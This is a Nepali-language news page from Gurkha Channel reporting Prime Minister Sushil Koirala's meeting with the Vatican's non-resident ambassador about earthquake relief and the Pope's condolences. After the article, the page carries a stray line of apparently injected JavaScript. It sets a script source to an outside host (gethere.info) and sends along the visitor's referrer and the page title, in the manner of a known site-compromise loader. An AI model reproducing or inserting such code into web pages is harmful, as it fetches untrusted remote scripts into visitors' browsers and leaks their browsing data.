प्रधानमन्त्री सुशील कोइरालासंग भ्याटिकन सिटीका गैर आवासीय राजदूत साल्भाटोर पेनासोे

Naresh Ale Avatar

प्रधानमन्त्री सुशील कोइरालासंग भ्याटिकन सिटीका गैर आवासीय राजदूत साल्भाटोर पेनासोे शनिबार बालुवाटारमा भेट गर्नुभएको छ। भेटमा नेपालमा हालै आएको विनासकारी भूकम्पले पु¥याएको जनधनको क्षति,खोजी,उद्धार राहत र पुनस्थापनाका विषयमा कुराकानी भएको थियो।

भेटमा राजदूत पेनासोले नेपालमा आएको विनासकारी भूकम्पबाट भएको जनधनको क्षतिप्रति प्रधानमन्त्री कोइराला उहाँ मार्फत नेपाली जनता र पीडित परिवारलाई पोपले सहानुभूति र समवेदना पठाउनु भएको बताउनु भयो। सो अवसरमा प्रधानमन्त्री कोइरालाले नेपालमा ८२ बर्षपछि अकल्पनीय विपद् आएको र मित्रराष्ट्रहरुको सहयोगले यो प्रकोपको सामना गरिएको बताउनु भयो। सीमित स्रोत र साधनका बाबजूद छोटो समयमा नेपालमा भएको खोजी,उद्धार र राहतका कार्यको विकसित मुलुकहरुबाट समेत प्रशंसा भएको उहाँले बताउनु भयो। प्रधानमन्त्री कोइरालाले सरकारको ध्यान राहत र पुनःस्थापनामा केन्द्रित भएको पनि बताउनुभएको प्रधानमन्त्रीका पराराष्ट्र सल्लाहकार डाक्टर दिनेश भट्टराईले जानकारी दिनुभयो।

सो अवसरमा राजदूत पेनासेले होली सीले पीडितहरुलाई राहत सामग्री पठाएको पनि बताउनु भएको थियो। प्रधानमन्त्री कोइरालाले नेपाललाई विपद् परेको बेलामा सहयोग गर्नुभएकोमा होली सीका पोपप्रति धन्यवाद ज्ञापन पनि गर्नुभएको थियो।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

admin Avatar
About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories